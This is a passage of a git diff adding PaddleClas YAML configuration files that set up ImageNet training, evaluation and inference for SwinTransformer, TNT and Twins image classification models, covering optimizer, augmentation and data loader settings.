Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window12_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window12_384.yaml new file mode 100644 index 0000000..6c3abe6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window12_384.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + 
pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_large_patch4_window12_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: 
./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window7_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window7_224.yaml new file mode 100644 index 0000000..dd2b2ac --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_large_patch4_window7_224.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_large_patch4_window7_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + 
epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + 
to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_small_patch4_window7_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_small_patch4_window7_224.yaml new file mode 100644 index 0000000..34a80d8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_small_patch4_window7_224.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_small_patch4_window7_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + 
- DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_tiny_patch4_window7_224.yaml 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_tiny_patch4_window7_224.yaml new file mode 100644 index 0000000..d921593 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_tiny_patch4_window7_224.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_tiny_patch4_window7_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + 
MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/TNT/TNT_small.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/TNT/TNT_small.yaml new file mode 100644 index 0000000..dff9af2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/TNT/TNT_small.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: 
TNT_small + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 248 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 248 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_base.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_base.yaml new file mode 100644 index 0000000..17fd657 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_base.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: alt_gvt_base + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.3 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + 
batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_large.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_large.yaml new file mode 100644 index 0000000..393a638 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_large.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: 
./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: alt_gvt_large + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.5 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 
0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_small.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_small.yaml new file mode 100644 index 0000000..b40f518 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_small.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: alt_gvt_small + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.2 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + 
warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: 
ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_base.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_base.yaml new file mode 100644 index 0000000..4c7c099 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_base.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: pcpvt_base + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.3 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + 
sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + 